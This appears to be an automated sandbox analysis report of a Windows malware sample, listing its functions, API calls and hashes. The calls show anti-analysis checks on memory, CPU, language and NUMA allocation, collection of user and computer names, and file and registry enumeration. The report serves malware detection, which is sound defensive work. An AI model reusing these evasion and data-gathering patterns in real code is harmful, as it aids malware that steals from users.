                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: lstrcat$CloseOpenQueryValuememset
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2623679115-0
                                                                                                                                                                                                                                                                                        • Opcode ID: bf11c5f64fb992b3c772fe614ac28ac6fc491ab679ab64900ab2a626250608f3
                                                                                                                                                                                                                                                                                        • Instruction ID: 8aed71b150b2ed53c6c52757a29982c6d8c6785b9d22af2673d92710ece34b21
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bf11c5f64fb992b3c772fe614ac28ac6fc491ab679ab64900ab2a626250608f3
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F641B4B2900108BBCB15EBE0DC86FEE733EAB88745F00454DF71A5A191EE7467848BE1
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 00409B30 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 360filestringCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                                                                          • Part of subcall function 00415260: GetSystemTime.KERNEL32(?,04407710,0041D129,?,?,?,?,?,?,?,?,?,00404623,?,00000014), ref: 00415286
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                                                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00409BB1
                                                                                                                                                                                                                                                                                        • lstrlen.KERNEL32(00000000), ref: 00409F6A
                                                                                                                                                                                                                                                                                          • Part of subcall function 004097F0: memcmp.MSVCRT ref: 0040980B
                                                                                                                                                                                                                                                                                          • Part of subcall function 004097F0: memset.MSVCRT ref: 0040983E
                                                                                                                                                                                                                                                                                          • Part of subcall function 004097F0: LocalAlloc.KERNEL32(00000040,?), ref: 0040988E
                                                                                                                                                                                                                                                                                        • lstrlen.KERNEL32(00000000,00000000), ref: 00409CAD
                                                                                                                                                                                                                                                                                        • DeleteFileA.KERNEL32(00000000), ref: 00409FEB
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: lstrcpy$lstrlen$Filelstrcat$AllocCopyDeleteLocalSystemTimememcmpmemset
                                                                                                                                                                                                                                                                                        • String ID: X@
                                                                                                                                                                                                                                                                                        • API String ID: 3258613111-2850556465
                                                                                                                                                                                                                                                                                        • Opcode ID: cd8ce6d40e5afa3ebb260d2b60027121d441955b8b015006d91c09b557981aa9
                                                                                                                                                                                                                                                                                        • Instruction ID: 70962d3f4e1e977daa55f2855abdfba287f36735b870bb76fdd61a7d9847a281
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cd8ce6d40e5afa3ebb260d2b60027121d441955b8b015006d91c09b557981aa9
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BCD10376D101089ACB14FBA5DC91EEE7739BF14304F51825EF51672091EF38AA89CBB8
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 004136B0 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(75900000,043EAC98), ref: 00415F11
                                                                                                                                                                                                                                                                                          • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(75900000,043EACB0), ref: 00415F2A
                                                                                                                                                                                                                                                                                          • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(75900000,044033B8), ref: 00415F42
                                                                                                                                                                                                                                                                                          • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(75900000,04403370), ref: 00415F5A
                                                                                                                                                                                                                                                                                          • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(75900000,044032F8), ref: 00415F73
                                                                                                                                                                                                                                                                                          • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(75900000,04402B00), ref: 00415F8B
                                                                                                                                                                                                                                                                                          • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(75900000,043E7800), ref: 00415FA3
                                                                                                                                                                                                                                                                                          • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(75900000,043E7660), ref: 00415FBC
                                                                                                                                                                                                                                                                                          • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(75900000,04403298), ref: 00415FD4
                                                                                                                                                                                                                                                                                          • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(75900000,04403388), ref: 00415FEC
                                                                                                                                                                                                                                                                                          • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(75900000,044031D8), ref: 00416005
                                                                                                                                                                                                                                                                                          • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(75900000,04403358), ref: 0041601D
                                                                                                                                                                                                                                                                                          • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(75900000,043E7920), ref: 00416035
                                                                                                                                                                                                                                                                                          • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(75900000,04403430), ref: 0041604E
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                                                                          • Part of subcall function 00401190: ExitProcess.KERNEL32 ref: 004011D1
                                                                                                                                                                                                                                                                                          • Part of subcall function 00401120: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,004136D7,0041D6E3), ref: 0040112A
                                                                                                                                                                                                                                                                                          • Part of subcall function 00401120: ExitProcess.KERNEL32 ref: 0040113E
                                                                                                                                                                                                                                                                                          • Part of subcall function 004010D0: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,004136DC), ref: 004010EB
                                                                                                                                                                                                                                                                                          • Part of subcall function 004010D0: VirtualAllocExNuma.KERNEL32(00000000,?,?,004136DC), ref: 004010F2
                                                                                                                                                                                                                                                                                          • Part of subcall function 004010D0: ExitProcess.KERNEL32 ref: 00401103
                                                                                                                                                                                                                                                                                          • Part of subcall function 004011E0: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 004011FE
                                                                                                                                                                                                                                                                                          • Part of subcall function 004011E0: __aulldiv.LIBCMT ref: 00401218
                                                                                                                                                                                                                                                                                          • Part of subcall function 004011E0: __aulldiv.LIBCMT ref: 00401226
                                                                                                                                                                                                                                                                                          • Part of subcall function 004011E0: ExitProcess.KERNEL32 ref: 00401254
                                                                                                                                                                                                                                                                                          • Part of subcall function 00413430: GetUserDefaultLangID.KERNEL32(?,?,004136E6,0041D6E3), ref: 00413434
                                                                                                                                                                                                                                                                                          • Part of subcall function 00401150: ExitProcess.KERNEL32 ref: 00401186
                                                                                                                                                                                                                                                                                          • Part of subcall function 004143C0: GetProcessHeap.KERNEL32(00000000,00000104,00401177,044037A0,004136EB,0041D6E3), ref: 004143CD
                                                                                                                                                                                                                                                                                          • Part of subcall function 004143C0: HeapAlloc.KERNEL32(00000000), ref: 004143D4
                                                                                                                                                                                                                                                                                          • Part of subcall function 004143C0: GetUserNameA.ADVAPI32(?,00000104), ref: 004143EC
                                                                                                                                                                                                                                                                                          • Part of subcall function 00414400: GetProcessHeap.KERNEL32(00000000,00000104,004136EB,0041D6E3), ref: 0041440D
                                                                                                                                                                                                                                                                                          • Part of subcall function 00414400: HeapAlloc.KERNEL32(00000000), ref: 00414414
                                                                                                                                                                                                                                                                                          • Part of subcall function 00414400: GetComputerNameA.KERNEL32(?,00000104), ref: 0041442C
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                                                                        • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,04402B50,?,0041D8AC,?,00000000,?,0041D8B0,?,00000000,0041D6E3), ref: 0041378A
                                                                                                                                                                                                                                                                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004137A8
                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 004137B9
                                                                                                                                                                                                                                                                                        • Sleep.KERNEL32(00001770), ref: 004137C4
                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(?,00000000,?,04402B50,?,0041D8AC,?,00000000,?,0041D8B0,?,00000000,0041D6E3), ref: 004137DA
                                                                                                                                                                                                                                                                                        • ExitProcess.KERNEL32 ref: 004137E2
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: AddressProc$Process$Exit$Heap$Alloclstrcpy$CloseEventHandleNameUser__aulldiv$ComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1175201934-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 730e3f6f912575f9d2f5eb501aecbfb4f2d6af79dc721135fd94b85e33000efd
                                                                                                                                                                                                                                                                                        • Instruction ID: 0037ec1138340b95bb434dc328289296f16cab3c571637fdb93d627daa89b4d0
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 730e3f6f912575f9d2f5eb501aecbfb4f2d6af79dc721135fd94b85e33000efd
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7E318270A00204AADB04FBF2DC56BEE7779AF08708F10451EF112A61D2DF789A85C7AD
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 004123F0 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,044066B8), ref: 0041244B
                                                                                                                                                                                                                                                                                          • Part of subcall function 004154E0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,00000000), ref: 00412471
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,?), ref: 00412490
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,?), ref: 004124A4
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,043E5FD8), ref: 004124B7
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,?), ref: 004124CB
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,04406838), ref: 004124DF
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                                                                          • Part of subcall function 00415490: GetFileAttributesA.KERNEL32(00000000,?,0040E9F4,?,00000000,?,00000000,0041D76E,0041D76B), ref: 0041549F
                                                                                                                                                                                                                                                                                          • Part of subcall function 004121F0: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00412200
                                                                                                                                                                                                                                                                                          • Part of subcall function 004121F0: HeapAlloc.KERNEL32(00000000), ref: 00412207
                                                                                                                                                                                                                                                                                          • Part of subcall function 004121F0: wsprintfA.USER32 ref: 00412223
                                                                                                                                                                                                                                                                                          • Part of subcall function 004121F0: FindFirstFileA.KERNEL32(?,?), ref: 0041223A
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: lstrcat$FileHeap$AllocAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 167551676-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 6103e27345c9a11c188d3e1fa81259371cccefca6cbec786149d127ceb43b465
                                                                                                                                                                                                                                                                                        • Instruction ID: 26a05e4f659b4c4b868bb0234a0ad995871bbc4a3af1f84cd303f322fad0653f
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6103e27345c9a11c188d3e1fa81259371cccefca6cbec786149d127ceb43b465
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 083164B6900608A7CB20FBB0DC95EE9773DAB48704F40458EB3469A051EA7897C8CFD8
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 004011E0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 004011FE
                                                                                                                                                                                                                                                                                        • __aulldiv.LIBCMT ref: 00401218
                                                                                                                                                                                                                                                                                        • __aulldiv.LIBCMT ref: 00401226
                                                                                                                                                                                                                                                                                        • ExitProcess.KERNEL32 ref: 00401254
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                                                                                                                                                                                                                                                                        • String ID: @
                                                                                                                                                                                                                                                                                        • API String ID: 3404098578-2766056989
                                                                                                                                                                                                                                                                                        • Opcode ID: bb81cb4acda70f26030c3c2501203c3bf716c46d07ed01ddf58a3b899f1b5564
                                                                                                                                                                                                                                                                                        • Instruction ID: 7bcd30568b3a9749f5c78c38f6ef54fea4689c821e8202ed383253ad67bcf250
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bb81cb4acda70f26030c3c2501203c3bf716c46d07ed01ddf58a3b899f1b5564
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8601FFB0940208EADB10EFD0CD4AB9EBBB8AB54705F204059E705B62D0D6785545875D
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 6C75C930 Relevance: 7.6, APIs: 5, Instructions: 83memoryCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetSystemInfo.KERNEL32(?), ref: 6C75C947
                                                                                                                                                                                                                                                                                        • VirtualAlloc.KERNEL32(?,?,00002000,00000001), ref: 6C75C969
                                                                                                                                                                                                                                                                                        • GetSystemInfo.KERNEL32(?), ref: 6C75C9A9
                                                                                                                                                                                                                                                                                        • VirtualFree.KERNEL32(00000000,?,00008000), ref: 6C75C9C8
                                                                                                                                                                                                                                                                                        • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001), ref: 6C75C9E2
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468162713.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468271199.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468295787.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c740000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Virtual$AllocInfoSystem$Free
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 4191843772-0
                                                                                                                                                                                                                                                                                        • Opcode ID: ff6a4e2d4bd648d1e0519e5e05faac0e3fe705bc3137f3301c4d36b3d12e19c5
                                                                                                                                                                                                                                                                                        • Instruction ID: e237b3d2f3733e8c452f0589627fe10f3baa59e5c5315bcac129fe2396057b35
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ff6a4e2d4bd648d1e0519e5e05faac0e3fe705bc3137f3301c4d36b3d12e19c5
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AE2129717412096FDB14AB24CD89BAE77B9EB4A701F90013AF903A7B80DF306E0087A1
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 00412980 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 70stringCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 004154E0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,00000000), ref: 004129BA
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,0041D888), ref: 004129D7
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,04403630), ref: 004129EB
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,0041D88C), ref: 004129FD
                                                                                                                                                                                                                                                                                          • Part of subcall function 00412570: wsprintfA.USER32 ref: 00412589
                                                                                                                                                                                                                                                                                          • Part of subcall function 00412570: FindFirstFileA.KERNELBASE(?,?), ref: 004125A0
                                                                                                                                                                                                                                                                                          • Part of subcall function 00412570: StrCmpCA.SHLWAPI(?,0041D864), ref: 004125CE
                                                                                                                                                                                                                                                                                          • Part of subcall function 00412570: StrCmpCA.SHLWAPI(?,0041D868), ref: 004125E4
                                                                                                                                                                                                                                                                                          • Part of subcall function 00412570: FindNextFileA.KERNEL32(000000FF,?), ref: 004127B9
                                                                                                                                                                                                                                                                                          • Part of subcall function 00412570: FindClose.KERNEL32(000000FF), ref: 004127CE
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                                                                                                                                                                                                                                                                        • String ID: L0A
                                                                                                                                                                                                                                                                                        • API String ID: 2667927680-1482484291
                                                                                                                                                                                                                                                                                        • Opcode ID: f3e6bd076d21e16df55fd7eb472b4ad65ac1318d51bf9674c6e2c7c7c76ac990
                                                                                                                                                                                                                                                                                        • Instruction ID: f34e92357168eddbedcb052ffd5f2c6281475bb6170069d81cff4dd89e8051f4
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f3e6bd076d21e16df55fd7eb472b4ad65ac1318d51bf9674c6e2c7c7c76ac990
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A621CCBA9005087BC724FBA0DD46EDA373E9B54745F00058AB64956081EE7867C48BD5
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 00401260 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 00401274
                                                                                                                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 0040127B
                                                                                                                                                                                                                                                                                        • RegOpenKeyExA.KERNEL32(000000FF,?,00000000,00020119,?), ref: 00401297
                                                                                                                                                                                                                                                                                        • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012B5
                                                                                                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 004012BF
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3466090806-0
                                                                                                                                                                                                                                                                                        • Opcode ID: df6da7dedf044903e367d3d8a7ae0c03a7d74832a2c3d67e0360b54011cb2cfc
                                                                                                                                                                                                                                                                                        • Instruction ID: 7bc2c45b39987af01ac2684a9b0918313f40fb8da876f9e4b9d967da472c28c8
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: df6da7dedf044903e367d3d8a7ae0c03a7d74832a2c3d67e0360b54011cb2cfc
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3C011D79A40608BFDB20DFE0DD49FAEB779AB88700F008159FA05E7280DA749A018B90
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 00414740 Relevance: 7.5, APIs: 5, Instructions: 38registrymemoryCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00414754
                                                                                                                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 0041475B
                                                                                                                                                                                                                                                                                        • RegOpenKeyExA.KERNEL32(80000002,043EC9E0,00000000,00020119,00000000), ref: 0041477B
                                                                                                                                                                                                                                                                                        • RegQueryValueExA.KERNEL32(00000000,04406E98,00000000,00000000,000000FF,000000FF), ref: 0041479C
                                                                                                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 004147A6
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
